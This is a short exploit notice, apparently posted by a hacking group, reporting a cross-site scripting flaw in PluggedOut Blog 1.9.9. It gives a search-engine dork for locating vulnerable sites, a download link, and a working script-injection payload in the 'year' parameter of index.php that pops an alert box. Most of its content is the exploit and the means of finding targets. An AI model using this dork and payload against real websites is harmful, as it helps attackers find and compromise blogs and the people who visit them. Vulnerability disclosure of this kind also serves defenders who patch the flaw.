PluggedOut Blog 1.9.9 Cross Site Scripting

`f0und by: kurdish hackers team  
group: kurd-team  
c0ntact: [email protected]  
site: www.kurdteam.org  
=================================  
==============script===============  
=================================  
script: PluggedOut Blog 1.9.9  
d0rk:"Powered by PluggedOut Blog 1.9.9i, © Jonathan Beckett, 2006, All Rights Reserved"  
  
download  
:http://down.zzbaike.com/d/download.php?n=1&server=1id=752::1207987997  
=============================  
Expl0it:  
  
index.php?year=<script>alert(88888)</script>  
  
=============================  
zryan_kurd ,r00t_SyS  
  
  
  
  
`